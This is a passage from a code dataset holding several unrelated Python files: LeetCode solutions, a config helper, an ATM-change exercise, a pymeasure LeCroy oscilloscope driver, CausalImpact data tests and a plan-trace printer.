para = \"\"\n key = word\n if interested is True and heading_flag is False:\n para += ' ' + datum\n print(sum([len(dataset[key]) for key in dataset.keys()]), len(dataset.keys()) * 200)\n if sum([len(dataset[key]) for key in dataset.keys()]) > len(dataset.keys()) * 200:\n for key in dataset:\n 
print(key)\n print('--' * 4),\n print(dataset[key])\n break\n self.dict2csv(dataset)\n\n def _clean_sentence(self, sentence):\n if sentence.strip() == '':\n return []\n sections = wikitextparser.parse(sentence).sections\n text = \"\"\n for section in sections:\n try:\n text += section.plain_text()\n except (IndexError, AttributeError):\n continue\n text = text.split('. ')\n text = [i + '. ' for i in text if len(i) > 0]\n return text\n \n def dict2csv(self, dict):\n location = 'narrativelab/tropes/analysis/wikipedia/output.csv'\n location = self._jade_logger.file_manager.code_filepath(location)\n writer = csv.writer(open(location, 'wt'))\n for key, value in dict.items():\n for line in value:\n line = re.sub(r'\\n', '', line)\n if 'ref' in line or line.strip() == '' or len(line) < 10:\n continue\n writer.writerow([key, line])\n\n\nif __name__ == '__main__':\n wa = WikipediaAnalysis()\n wa.load()\n wa.create_dataset()\n","repo_name":"vedmathai/narrativelab","sub_path":"tropes/analysis/wikipedia/dataset_creator.py","file_name":"dataset_creator.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"69794395786","text":"# Problem Statement: https://leetcode.com/problems/next-greater-element-i/\n\nclass Solution:\n def nextGreaterElement(self, nums1: List[int], nums2: List[int]) -> List[int]:\n greater_map = {x : -1 for x in nums1} \n stack = []\n\t\t\n for num in nums2:\n while stack and stack[-1] < num:\n prev_num = stack.pop()\n if prev_num in greater_map:\n greater_map[prev_num] = num\n stack.append(num)\n \n return [greater_map[x] for x in nums1]","repo_name":"yashitanamdeo/leetcode","sub_path":"Easy/496. Next Greater Element I.py","file_name":"496. Next Greater Element I.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"81"} +{"seq_id":"38887086028","text":"import configparser\n\n\n# 全局变量\nclass GloVar:\n config_file_path = 'config/config.ini'\n\n\n# 配置文件路径\nclass IconPath:\n open_picture_folder = 'config/icon/open_picture.png'\n open_picture = 'config/icon/open_picture.png'\n zoom_picture = 'config/icon/zoom.png'\n zoom_out_picture = 'config/icon/zoom_out.png'\n original_size_picture = 'config/icon/original_size.png'\n screen_shot = 'config/icon/screen_shot.png'\n suitable_size = 'config/icon/suitable_size.png'\n last_picture = 'config/icon/last.png'\n next_picture = 'config/icon/next.png'\n left_picture = 'config/icon/left.png'\n right_picture = 'config/icon/right.png'\n save_picture = 'config/icon/save.png'\n select_path = 'config/icon/select_path.png'\n\n\n# 配置文件的读取和写入\nclass Profile:\n # 获取配置文件value\n @staticmethod\n def get_config_value(file, section, option):\n config = configparser.ConfigParser()\n config.read(file, encoding='utf-8')\n value = config.get(section, option)\n return value\n\n # 设置config的参数\n @staticmethod\n def set_config_value(file, section, option, value):\n config = configparser.ConfigParser()\n config.read(file, encoding='utf-8')\n if section not in config.sections():\n config.add_section(section)\n config.set(section, option, str(value))\n with open(file, 'w+', encoding='utf-8') as cf:\n config.write(cf)\n\n # 获取节点options\n @staticmethod\n def get_config_options(file, section):\n config = configparser.ConfigParser()\n config.read(file, encoding='utf-8-sig')\n options = config.options(section)\n return options\n\n\n# 合并路径(传入要合并的几个部分)\nclass MergePath:\n @staticmethod\n def 
merge_path(*args):\n path_list = []\n for section in args:\n if '\\\\\\\\' in section:\n section = section.replace('\\\\\\\\', '/')\n elif '\\\\' in section:\n section = section.replace('\\\\', '/')\n else:\n section = section\n path_list.append(section)\n merged_path = '/'.join(path_list)\n if '//' in merged_path:\n merged_path = merged_path.replace('//', '/')\n else:\n merged_path = merged_path\n return merged_path\n","repo_name":"mrshensong/picture_tool","sub_path":"global_var.py","file_name":"global_var.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36045068833","text":"# Desafio 71 - Simulador de caixa eletrônico\r\n\r\n\"\"\"\r\nCrie um programa que simule o funcionamento de um caixa eletrônico. No inicio, pergunte ao usuario\r\nqual sera o valor a ser sacado (numero inteiro) e o programa vai informar quantas cédulas de cada\r\nvalor serão entregues\r\n\r\nobs: Considere que o caixa possui cédulas de R$50, R$20, R$10 e R$1\r\n\"\"\"\r\n\r\nfrom time import sleep\r\nprint('\\033[31m=' * 30)\r\nprint(f'{\"BANCO\":^30}')\r\nprint('=' * 30, '\\033[m')\r\nvalor = int(input('Qual valor você quer sacar? R$'))\r\nsleep(0.5)\r\nprint('\\033[34mSacando...\\033[m')\r\nsleep(1)\r\ntotal = valor\r\ncéd = 100\r\ntotcéd = 0\r\nwhile True:\r\n if total >= céd:\r\n total -= céd\r\n totcéd += 1\r\n else:\r\n if totcéd > 0:\r\n print(f'Total de {totcéd} de {\"cédula\" if totcéd == 1 else \"cédulas\"} de R${céd}')\r\n if céd == 100:\r\n céd = 50\r\n elif céd == 50:\r\n céd = 20\r\n elif céd == 20:\r\n céd = 10\r\n elif céd == 10:\r\n céd = 5\r\n elif céd == 5:\r\n céd = 1\r\n totcéd = 0\r\n if total == 0:\r\n break\r\nprint('=' * 30)\r\nprint('\\033[34mValor sacado!\\033[m')","repo_name":"GuiPolezi/Cursoemvideo-Python","sub_path":"Exercícios/ex071.py","file_name":"ex071.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"20524072809","text":"import logging\nimport re\n\nfrom pymeasure.instruments import Instrument\nfrom pymeasure.instruments.teledyne.teledyne_oscilloscope import TeledyneOscilloscope,\\\n TeledyneOscilloscopeChannel, sanitize_source\nfrom pymeasure.instruments.validators import strict_discrete_set, strict_range\n\nlog = logging.getLogger(__name__)\nlog.addHandler(logging.NullHandler())\n\n\ndef _math_define_validator(value, values):\n \"\"\"\n Validate the input of the math_define property\n :param value: input parameters as a 3-element tuple\n :param values: allowed space for each parameter\n \"\"\"\n if not isinstance(value, tuple):\n raise ValueError('Input value {} of trigger_select should be a tuple'.format(value))\n if len(value) != 3:\n raise ValueError('Number of parameters {} different from 3'.format(len(value)))\n output = (sanitize_source(value[0]), value[1], sanitize_source(value[2]))\n for i in range(3):\n strict_discrete_set(output[i], values=values[i])\n return output\n\n\ndef _measure_delay_validator(value, values):\n \"\"\"\n Validate the input of the measure_delay property\n :param value: input parameters as a 3-element tuple\n :param values: allowed space for each parameter\n \"\"\"\n if not isinstance(value, tuple):\n raise ValueError('Input value {} of trigger_select should be a tuple'.format(value))\n if len(value) != 3:\n raise ValueError('Number of parameters {} different from 3'.format(len(value)))\n output = (value[0], sanitize_source(value[1]), 
sanitize_source(value[2]))\n if output[1][0] > output[2][0]:\n raise ValueError(f'First channel number {output[1]} must be <= than second one {output[2]}')\n for i in range(3):\n strict_discrete_set(output[i], values=values[i])\n return output\n\n\nclass LeCroyT3DSO1204Channel(TeledyneOscilloscopeChannel):\n \"\"\"Implementation of a LeCroy T3DSO1204 Oscilloscope channel.\n\n Implementation modeled on Channel object of Keysight DSOX1102G instrument.\n \"\"\"\n\n TRIGGER_SLOPES = {\"negative\": \"NEG\", \"positive\": \"POS\", \"window\": \"WINDOW\"}\n\n # Change listed values for existing commands:\n trigger_slope_values = TRIGGER_SLOPES\n\n bwlimit = Instrument.control(\n \"BWL?\", \"BWL %s\",\n \"\"\"Control the 20 MHz internal low-pass filter (strict bool).\n\n This oscilloscope only has one frequency available for this filter.\n \"\"\",\n validator=strict_discrete_set,\n values=TeledyneOscilloscopeChannel._BOOLS,\n map_values=True\n )\n\n invert = Instrument.control(\n \"INVS?\", \"INVS %s\",\n \"\"\"Control the inversion of the input signal (strict bool).\"\"\",\n validator=strict_discrete_set,\n values=TeledyneOscilloscopeChannel._BOOLS,\n map_values=True\n )\n\n skew_factor = Instrument.control(\n \"SKEW?\", \"SKEW %.2ES\",\n \"\"\"Control the channel-to-channel skew factor for the specified channel.\n Each analog channel can be adjusted + or -100 ns for a total of 200 ns difference\n between channels. You can use the oscilloscope's skew control to remove cable-delay\n errors between channels.\n \"\"\",\n validator=strict_range,\n values=[-1e-7, 1e-7],\n preprocess_reply=lambda v: v.rstrip('S')\n )\n\n trigger_level2 = Instrument.control(\n \"TRLV2?\", \"TRLV2 %.2EV\",\n \"\"\"Control the lower trigger level voltage for the specified source (float).\n Higher and lower trigger levels are used with runt/slope triggers.\n When setting the trigger level it must be divided by the probe attenuation. This is\n not documented in the datasheet and it is probably a bug of the scope firmware.\n An out-of-range value will be adjusted to the closest legal value.\n \"\"\"\n )\n\n unit = Instrument.control(\n \"UNIT?\", \"UNIT %s\",\n \"\"\"Control the unit of the specified trace. Measurement results, channel sensitivity, and\n trigger level will reflect the measurement units you select. (\"A\" for Amperes, \"V\" for\n Volts).\n \"\"\",\n validator=strict_discrete_set,\n values=[\"A\", \"V\"]\n )\n\n\nclass LeCroyT3DSO1204(TeledyneOscilloscope):\n \"\"\"Represents the LeCroy T3DSO1204 Oscilloscope interface for interacting with the instrument.\n\n Refer to the LeCroy T3DSO1204 Oscilloscope Programmer's Guide for further details about\n using the lower-level methods to interact directly with the scope.\n\n This implementation is based on the shared base class :class:`TeledyneOscilloscope`.\n\n Attributes:\n\n WRITE_INTERVAL_S: minimum time between two commands. If a command is received less than\n WRITE_INTERVAL_S after the previous one, the code blocks until at least WRITE_INTERVAL_S\n seconds have passed.\n Because the oscilloscope takes a non-negligible time to perform some operations, it might\n be needed for the user to tweak the sleep time between commands.\n The WRITE_INTERVAL_S is set to 10ms as default however its optimal value heavily depends\n on the actual commands and on the connection type, so it is impossible to give a unique\n value to fit all cases. An interval between 10ms and 500ms second proved to be good,\n depending on the commands and connection latency.\n\n .. 
code-block:: python\n\n scope = LeCroyT3DSO1204(resource)\n scope.autoscale()\n ch1_data_array, ch1_preamble = scope.download_waveform(source=\"C1\", points=2000)\n # ...\n scope.shutdown()\n \"\"\"\n\n _BOOLS = {True: \"ON\", False: \"OFF\"}\n\n WRITE_INTERVAL_S = 0.02 # seconds\n\n ch_1 = Instrument.ChannelCreator(LeCroyT3DSO1204Channel, 1)\n\n ch_2 = Instrument.ChannelCreator(LeCroyT3DSO1204Channel, 2)\n\n ch_3 = Instrument.ChannelCreator(LeCroyT3DSO1204Channel, 3)\n\n ch_4 = Instrument.ChannelCreator(LeCroyT3DSO1204Channel, 4)\n\n def __init__(self, adapter, name=\"LeCroy T3DSO1204 Oscilloscope\", **kwargs):\n super().__init__(adapter, name, **kwargs)\n\n ##################\n # Timebase Setup #\n ##################\n\n timebase_hor_magnify = Instrument.control(\n \"HMAG?\", \"HMAG %.2ES\",\n \"\"\"Control the zoomed (delayed) window horizontal scale (seconds/div).\n\n The main sweep scale determines the range for this command.\n \"\"\",\n validator=strict_range,\n values=[1e-9, 20e-3]\n )\n\n timebase_hor_position = Instrument.control(\n \"HPOS?\", \"HPOS %.2ES\",\n \"\"\"Control the horizontal position in the zoomed (delayed) view of the main sweep.\n\n The main sweep range and the main sweep horizontal position determine\n the range for this command. The value for this command must keep the zoomed view window\n within the main sweep range.\n \"\"\",\n )\n\n @property\n def timebase(self):\n \"\"\"Get timebase setup as a dict containing the following keys:\n\n - \"timebase_scale\": horizontal scale in seconds/div (float)\n - \"timebase_offset\": interval in seconds between the trigger and the reference\n position (float)\n - \"timebase_hor_magnify\": horizontal scale in the zoomed window in seconds/div (float)\n - \"timebase_hor_position\": horizontal position in the zoomed window in seconds\n (float)\n\n \"\"\"\n tb_setup = {\n \"timebase_scale\": self.timebase_scale,\n \"timebase_offset\": self.timebase_offset,\n \"timebase_hor_magnify\": self.timebase_hor_magnify,\n \"timebase_hor_position\": self.timebase_hor_position\n }\n return tb_setup\n\n def timebase_setup(self, scale=None, offset=None, hor_magnify=None, hor_position=None):\n \"\"\"Set up timebase. Unspecified parameters are not modified. Modifying a single parameter\n might impact other parameters. 
Refer to oscilloscope documentation and make multiple\n consecutive calls to timebase_setup if needed.\n\n :param scale: interval in seconds between the trigger event and the reference position.\n :param offset: horizontal scale per division in seconds/div.\n :param hor_magnify: horizontal scale in the zoomed window in seconds/div.\n :param hor_position: horizontal position in the zoomed window in seconds.\"\"\"\n\n if scale is not None:\n self.timebase_scale = scale\n if offset is not None:\n self.timebase_offset = offset\n if hor_magnify is not None:\n self.timebase_hor_magnify = hor_magnify\n if hor_position is not None:\n self.timebase_hor_position = hor_position\n\n ###############\n # Acquisition #\n ###############\n\n acquisition_type = Instrument.control(\n \"ACQW?\", \"ACQW %s\",\n \"\"\"Control the type of data acquisition.\n\n Can be 'normal', 'peak', 'average', 'highres'.\n \"\"\",\n validator=strict_discrete_set,\n values={\"normal\": \"SAMPLING\", \"peak\": \"PEAK_DETECT\", \"average\": \"AVERAGE\",\n \"highres\": \"HIGH_RES\"},\n map_values=True,\n get_process=lambda v: [v[0].lower(), int(v[1])] if len(v) == 2 and v[0] == \"AVERAGE\" else v\n )\n\n acquisition_average = Instrument.control(\n \"AVGA?\", \"AVGA %d\",\n \"\"\"Control the averaging times of average acquisition.\"\"\",\n validator=strict_discrete_set,\n values=[4, 16, 32, 64, 128, 256, 512, 1024]\n )\n\n acquisition_status = Instrument.measurement(\n \"SAST?\", \"\"\"Get the acquisition status of the scope.\"\"\",\n values={\"stopped\": \"Stop\", \"triggered\": \"Trig'd\", \"ready\": \"Ready\", \"auto\": \"Auto\",\n \"armed\": \"Arm\"},\n map_values=True\n )\n\n acquisition_sampling_rate = Instrument.measurement(\n \"SARA?\", \"\"\"Get the sample rate of the scope.\"\"\"\n )\n\n def acquisition_sample_size(self, source):\n \"\"\"Get acquisition sample size for a certain channel. Used mainly for waveform acquisition.\n If the source is MATH, the SANU? MATH query does not seem to work, so I return the memory\n size instead.\n\n :param source: channel number of channel name.\n :return: acquisition sample size of that channel.\n \"\"\"\n if isinstance(source, str):\n source = sanitize_source(source)\n if source in [1, \"C1\"]:\n return self.acquisition_sample_size_c1\n elif source in [2, \"C2\"]:\n return self.acquisition_sample_size_c2\n elif source in [3, \"C3\"]:\n return self.acquisition_sample_size_c3\n elif source in [4, \"C4\"]:\n return self.acquisition_sample_size_c4\n elif source == \"MATH\":\n math_define = self.math_define[1]\n match = re.match(r\"'(\\w+)[+\\-/*](\\w+)'\", math_define)\n return min(self.acquisition_sample_size(match.group(1)),\n self.acquisition_sample_size(match.group(2)))\n else:\n raise ValueError(\"Invalid source: must be 1, 2, 3, 4 or C1, C2, C3, C4, MATH.\")\n\n acquisition_sample_size_c1 = Instrument.measurement(\n \"SANU? C1\", \"\"\"Get the number of data points that the hardware\n will acquire from the input signal of channel 1.\n Note.\n Channel 2 and channel 1 share the same ADC, so the sample is the same too.\n \"\"\"\n )\n\n acquisition_sample_size_c2 = Instrument.measurement(\n \"SANU? C1\", \"\"\"Get the number of data points that the hardware\n will acquire from the input signal of channel 2.\n Note.\n Channel 2 and channel 1 share the same ADC, so the sample is the same too.\n \"\"\"\n )\n\n acquisition_sample_size_c3 = Instrument.measurement(\n \"SANU? 
C3\", \"\"\"Get the number of data points that the hardware\n will acquire from the input signal of channel 3.\n Note.\n Channel 3 and channel 4 share the same ADC, so the sample is the same too.\n \"\"\"\n )\n\n acquisition_sample_size_c4 = Instrument.measurement(\n \"SANU? C3\", \"\"\"Get the number of data points that the hardware\n will acquire from the input signal of channel 4.\n Note.\n Channel 3 and channel 4 share the same ADC, so the sample is the same too.\n \"\"\"\n )\n\n ##################\n # Waveform #\n ##################\n\n memory_size = Instrument.control(\n \"MSIZ?\", \"MSIZ %s\",\n \"\"\"Control the maximum depth of memory.\n\n :={7K,70K,700K,7M} for non-interleaved mode. Non-interleaved means a single channel is\n active per A/D converter. Most oscilloscopes feature two channels per A/D converter.\n\n :={14K,140K,1.4M,14M} for interleave mode. Interleave mode means multiple active\n channels per A/D converter.\n \"\"\",\n validator=strict_discrete_set,\n values={7e3: \"7K\", 7e4: \"70K\", 7e5: \"700K\", 7e6: \"7M\",\n 14e3: \"14K\", 14e4: \"140K\", 14e5: \"1.4M\", 14e6: \"14M\"},\n map_values=True\n )\n\n @property\n def waveform_preamble(self):\n \"\"\"Get preamble information for the selected waveform source as a dict with the\n following keys:\n\n - \"type\": normal, peak detect, average, high resolution (str)\n - \"requested_points\": number of data points requested by the user (int)\n - \"sampled_points\": number of data points sampled by the oscilloscope (int)\n - \"transmitted_points\": number of data points actually transmitted (optional) (int)\n - \"memory_size\": size of the oscilloscope internal memory in bytes (int)\n - \"sparsing\": sparse point. It defines the interval between data points. (int)\n - \"first_point\": address of the first data point to be sent (int)\n - \"source\": source of the data : \"C1\", \"C2\", \"C3\", \"C4\", \"MATH\".\n - \"unit\": Physical units of the Y-axis\n - \"type\": type of data acquisition. Can be \"normal\", \"peak\", \"average\", \"highres\"\n - \"average\": average times of average acquisition\n - \"sampling_rate\": sampling rate (it is a read-only property)\n - \"grid_number\": number of horizontal grids (it is a read-only property)\n - \"status\": acquisition status of the scope. 
Can be \"stopped\", \"triggered\", \"ready\",\n \"auto\", \"armed\"\n - \"xdiv\": horizontal scale (units per division) in seconds\n - \"xoffset\": time interval in seconds between the trigger event and the reference position\n - \"ydiv\": vertical scale (units per division) in Volts\n - \"yoffset\": value that is represented at center of screen in Volts\n \"\"\"\n vals = self.values(\"WFSU?\")\n preamble = {\n \"sparsing\": vals[vals.index(\"SP\") + 1],\n \"requested_points\": vals[vals.index(\"NP\") + 1],\n \"first_point\": vals[vals.index(\"FP\") + 1],\n \"transmitted_points\": None,\n \"source\": self.waveform_source,\n \"type\": self.acquisition_type,\n \"sampling_rate\": self.acquisition_sampling_rate,\n \"grid_number\": self._grid_number,\n \"status\": self.acquisition_status,\n \"memory_size\": self.memory_size,\n \"xdiv\": self.timebase_scale,\n \"xoffset\": self.timebase_offset\n }\n preamble[\"average\"] = self.acquisition_average if preamble[\"type\"][0] == \"average\" else None\n strict_discrete_set(self.waveform_source, [\"C1\", \"C2\", \"C3\", \"C4\", \"MATH\"])\n preamble[\"sampled_points\"] = self.acquisition_sample_size(self.waveform_source)\n return self._fill_yaxis_preamble(preamble)\n\n def _fill_yaxis_preamble(self, preamble=None):\n \"\"\"Fill waveform preamble section concerning the Y-axis.\n :param preamble: waveform preamble to be filled\n :return: filled preamble\n \"\"\"\n if preamble is None:\n preamble = {}\n if self.waveform_source == \"MATH\":\n preamble[\"ydiv\"] = self.math_vdiv\n preamble[\"yoffset\"] = self.math_vpos\n preamble[\"unit\"] = None\n else:\n preamble[\"ydiv\"] = self.ch(self.waveform_source).scale\n preamble[\"yoffset\"] = self.ch(self.waveform_source).offset\n preamble[\"unit\"] = self.ch(self.waveform_source).unit\n return preamble\n\n ###############\n # Math #\n ###############\n\n math_define = Instrument.control(\n \"DEF?\", \"DEF EQN,'%s%s%s'\",\n \"\"\"Control the desired waveform math operation between two channels.\n\n Three parameters must be passed as a tuple:\n\n #. source1 : source channel on the left\n #. operation : operator must be \"*\", \"/\", \"+\", \"-\"\n #. source2 : source channel on the right\n\n \"\"\",\n validator=_math_define_validator,\n values=[[\"C1\", \"C2\", \"C3\", \"C4\"], [\"*\", \"/\", \"+\", \"-\"], [\"C1\", \"C2\", \"C3\", \"C4\"]]\n )\n\n math_vdiv = Instrument.control(\n \"MTVD?\", \"MTVD %.2EV\",\n \"\"\"Control the vertical scale of the selected math operation.\n\n This command is only valid in add, subtract, multiply and divide operation.\n Note: legal values for the scale depend on the selected operation.\n \"\"\",\n validator=strict_discrete_set,\n values=[5e-4, 1e-3, 2e-3, 5e-3, 0.01, 0.02, 0.05, 0.1, 0.2, 0.5, 1, 2, 5, 10, 20, 50, 100]\n )\n\n math_vpos = Instrument.control(\n \"MTVP?\", \"MTVP %d\",\n \"\"\"Control the vertical position of the math waveform with specified source.\n\n Note: the point represents the screen pixels and is related to the screen center. For\n example, if the point is 50. The math waveform will be displayed 1 grid above the vertical\n center of the screen. Namely one grid is 50.\n \"\"\",\n validator=strict_range,\n values=[-255, 255]\n )\n\n ###############\n # Measure #\n ###############\n\n measure_delay = Instrument.control(\n \"MEAD?\", \"MEAD %s,%s-%s\",\n \"\"\"Control measurement delay.\n\n The MEASURE_DELY command places the instrument in the continuous measurement mode and\n starts a type of delay measurement.\n The MEASURE_DELY? 
query returns the measured value of delay type.\n The command accepts three arguments with the following syntax:\n\n measure_delay = (,,)\n\n := {PHA,FRR,FRF,FFR,FFF,LRR,LRF,LFR,LFF,SKEW}\n\n , := {C1,C2,C3,C4} where if sourceA=CX and sourceB=CY, then X < Y\n\n ========= ======================================================================\n Type Description\n ========= ======================================================================\n PHA The phase difference between two channels. (rising edge - rising edge)\n FRR Delay between two channels. (first rising edge - first rising edge)\n FRF Delay between two channels. (first rising edge - first falling edge)\n FFR Delay between two channels. (first falling edge - first rising edge)\n FFF Delay between two channels. (first falling edge - first falling edge)\n LRR Delay between two channels. (first rising edge - last rising edge)\n LRF Delay between two channels. (first rising edge - last falling edge)\n LFR Delay between two channels. (first falling edge - last rising edge)\n LFF Delay between two channels. (first falling edge - last falling edge)\n Skew Delay between two channels. (edge – edge of the same type)\n ========= ======================================================================\n \"\"\",\n validator=_measure_delay_validator,\n values=[[\"PHA\", \"FRR\", \"FRF\", \"FFR\", \"FFF\", \"LRR\", \"LRF\", \"LFR\", \"LFF\", \"Skey\"],\n [\"C1\", \"C2\", \"C3\", \"C4\"], [\"C1\", \"C2\", \"C3\", \"C4\"]]\n )\n\n ###############\n # Display #\n ###############\n\n menu = Instrument.control(\n \"MENU?\", \"MENU %s\",\n \"\"\"Control the bottom menu enabled state (strict bool).\"\"\",\n validator=strict_discrete_set,\n values=TeledyneOscilloscope._BOOLS,\n map_values=True\n )\n\n grid_display = Instrument.control(\n \"GRDS?\", \"GRDS %s\",\n \"\"\"Control the type of the grid which is used to display (FULL, HALF, OFF).\"\"\",\n validator=strict_discrete_set,\n values={\"full\": \"FULL\", \"half\": \"HALF\", \"off\": \"OFF\"},\n map_values=True\n )\n","repo_name":"pymeasure/pymeasure","sub_path":"pymeasure/instruments/lecroy/lecroyT3DSO1204.py","file_name":"lecroyT3DSO1204.py","file_ext":"py","file_size_in_byte":20269,"program_lang":"python","lang":"en","doc_type":"code","stars":514,"dataset":"github-code","pt":"81"} +{"seq_id":"41262401677","text":"# -*- coding: utf-8 -*-\n# @Author: WuLC\n# @Date: 2016-11-25 09:42:17\n# @Last modified by: WuLC\n# @Last Modified time: 2016-11-25 09:42:35\n# @Email: liangchaowu5@gmail.com\n\nclass Solution(object):\n def minMoves2(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n nums.sort()\n n = len(nums)\n target = (nums[n/2]+nums[n/2-1])/2 if n % 2 == 0 else nums[n/2]\n return sum([abs(num - target) for num in nums])","repo_name":"WuLC/LeetCode","sub_path":"Algorithm/Python/462. Minimum Moves to Equal Array Elements II.py","file_name":"462. 
Minimum Moves to Equal Array Elements II.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"81"} +{"seq_id":"38544401465","text":"import os\n\nfrom absl.testing import absltest\nfrom absl.testing import parameterized\n\nimport causalimpact.data as cid\n\nimport numpy as np\nimport pandas as pd\n\n\nCURR_PATH = os.path.dirname(__file__)\nTEST_DATA = os.path.join(CURR_PATH, \"testdata\", \"data.csv\")\n\n\nclass DataCreationTest(parameterized.TestCase):\n\n @classmethod\n def setUpClass(cls):\n super(DataCreationTest, cls).setUpClass()\n\n # Read in sample data and set column \"t\" as the index\n with open(TEST_DATA, \"r\") as fl:\n df = pd.read_csv(fl)\n df = df.set_index(pd.to_datetime(df[\"t\"]))\n df.drop(columns=[\"t\"], inplace=True)\n\n cls._data = df\n treatment_start_index = 60\n cls._pre_period = (df.index[0], df.index[treatment_start_index - 1])\n cls._post_period = (df.index[treatment_start_index], df.index[-1])\n cls._treatment_start = cls._post_period[0]\n\n def testCorrectDataWithOnlyOutcome(self):\n df = self._data[[\"y\"]]\n ci_data = cid.CausalImpactData(\n df, pre_period=self._pre_period, post_period=self._post_period)\n self.assertEqual(ci_data.outcome_column, \"y\")\n self.assertIsNone(ci_data.feature_columns)\n pre_index = self._data.index[self._data.index < self._treatment_start]\n post_index = self._data.index[self._data.index >= self._treatment_start]\n self.assertTrue(ci_data.model_pre_data.index.equals(pre_index))\n self.assertTrue(ci_data.model_after_pre_data.index.equals(post_index))\n\n @parameterized.named_parameters([\n {\n \"testcase_name\": \"only_outcome_given\",\n \"outcome_column\": \"y\",\n \"expected_feature_columns\": [\"x1\", \"x2\"]\n },\n {\n \"testcase_name\": \"no_columns_given\",\n \"outcome_column\": None,\n \"expected_feature_columns\": [\"x1\", \"x2\"]\n },\n ])\n def testCorrectDataWithColumnInput(self, outcome_column,\n expected_feature_columns):\n ci_data = cid.CausalImpactData(\n self._data,\n pre_period=self._pre_period,\n post_period=self._post_period,\n outcome_column=outcome_column)\n self.assertEqual(ci_data.outcome_column, \"y\")\n self.assertSetEqual(\n set(ci_data.feature_columns), set(expected_feature_columns))\n self.assertSetEqual(\n set(ci_data.pre_data.columns), set([\"y\"] + expected_feature_columns))\n self.assertSetEqual(\n set(ci_data.after_pre_data.columns),\n set([\"y\"] + expected_feature_columns))\n pre_index = self._data.index[self._data.index < self._treatment_start]\n post_index = self._data.index[self._data.index >= self._treatment_start]\n self.assertTrue(ci_data.pre_data.index.equals(pre_index))\n self.assertTrue(ci_data.after_pre_data.index.equals(post_index))\n\n def testFailsWhenOutcomeDoesntExist(self):\n with self.assertRaises(KeyError):\n cid.CausalImpactData(\n self._data,\n pre_period=self._pre_period,\n post_period=self._post_period,\n outcome_column=\"z\")\n\n @parameterized.named_parameters([{\n \"testcase_name\": \"NoStandardize\",\n \"standardize_data\": False\n }, {\n \"testcase_name\": \"Standardize\",\n \"standardize_data\": True\n }])\n def testStandardize(self, standardize_data):\n ci_data = cid.CausalImpactData(\n self._data,\n pre_period=self._pre_period,\n post_period=self._post_period,\n standardize_data=standardize_data)\n pre_time = pd.to_datetime(\"2016-02-20 22:41:20\")\n post_time = pd.to_datetime(\"2016-02-20 22:51:20\")\n index = [\"y\", \"x1\", \"x2\"]\n\n # These are just hard-coded values, to 
ensure there is some kind of\n # a difference that seems reasonable (e.g. could be standardized based\n # on looking at the numbers).\n if standardize_data:\n pd.testing.assert_series_equal(\n ci_data.model_pre_data.iloc[0],\n pd.Series([-0.718908, 1.684957, 0.705064], index=index,\n name=pre_time),\n # Allow minor differences due to encoding.\n rtol=0.01)\n pd.testing.assert_series_equal(\n ci_data.model_after_pre_data.iloc[0],\n pd.Series([0.355322, -1.456488, -2.652383],\n index=index,\n name=post_time),\n # Allow minor differences due to encoding.\n rtol=0.01)\n else:\n pd.testing.assert_series_equal(\n ci_data.pre_data.iloc[0],\n pd.Series([110.0, 134., 128], index=index, name=pre_time))\n pd.testing.assert_series_equal(\n ci_data.after_pre_data.iloc[0],\n pd.Series([123., 123., 123.], index=index, name=post_time),\n )\n\n def testMissingValues(self):\n na_data = self._data.copy()\n na_data.loc[self._treatment_start, \"x1\"] = np.nan\n with self.assertRaises(ValueError):\n cid.CausalImpactData(\n na_data, pre_period=self._pre_period, post_period=self._post_period)\n\n\nif __name__ == \"__main__\":\n absltest.main()\n","repo_name":"google/tfp-causalimpact","sub_path":"causalimpact/data_test.py","file_name":"data_test.py","file_ext":"py","file_size_in_byte":4864,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"81"} +{"seq_id":"37747795624","text":"import pickle\n\n\ndef print_map(map, locs):\n print('map:')\n d = [[0 for _ in range(0,len(map))] for _ in range(0, len(map[0]))]\n for x in range(0, len(map)):\n for y in range(0, len(map[x])):\n d[y][x] = ' ' + str(map[x][y])\n for a in locs:\n l = locs[a]\n if l[0] == x and l[1] == y:\n d[y][x] = a[0]\n for y in d:\n print(''.join(y))\n\n\ndef print_plan(plan):\n print('plan:')\n for p in plan:\n print(p[0])\n\ndef print_trace(states, plans):\n print('Trace of states and actions:')\n for i,s in enumerate(states):\n print('state', i)\n print_map(s.map, s.loc)\n # print('loc:')\n for agent in s.agents:\n if agent in s.loc:\n print(' ', agent[0], s.loc[agent])\n # print('targeting:')\n for t in s.target:\n print(f' (targeted {t[0]} {s.target[t][0]})')\n for a in s.score:\n print(f' (score {a[0]} {s.score[a]})')\n # print('goal:')\n # print(s.goal)\n for g in s.goal:\n print(f' (goal {g[0]} {s.goal[g]})')\n for a in s.assumes:\n print(f' (assumes {a[0]} {s.assumes[a]})')\n \n if i < len(plans)-1:\n print_plan(plans[i])\n\n\n# def print_truth(states):\n# print('Truth data:')\n# for i,s in enumerate(states):\n# if i > 0:\n# print('state', i)\n# for t in s.target:\n# print(f'(targeting {t[0]} {s.target[t][0]})')\n# for g in s.goal:\n# print(f'(goal {g[0]} {s.goal[g]})')\n\n\ndef print_sexpr(states):\n # agents\n for agent in states[0].agents:\n print(f'(isa {agent[0]} {agent[1]})')\n\n # goals\n # for agent in states[0].goal:\n # for goal in states[0].goal[agent]:\n # args = \"\".join(f' {a[0]}' for a in states[0].goal[agent][goal])\n # print(f'(goal {agent[0]} ({goal}{args}))')\n\n # maps\n for x in range(0, len(states[0].map)):\n for y in range(0, len(states[0].map[x])):\n if states[0].map[x][y] == 0:\n print(f'(blocked {x} {y})')\n else:\n print(f'(open {x} {y})')\n\n for i, s in enumerate(states):\n # locations\n for agent in s.agents:\n if agent in s.loc:\n x,y = s.loc[agent]\n print(f'(observesAt x (loc-at {agent[0]} {x} {y}) {i})')\n # goals\n for agent in 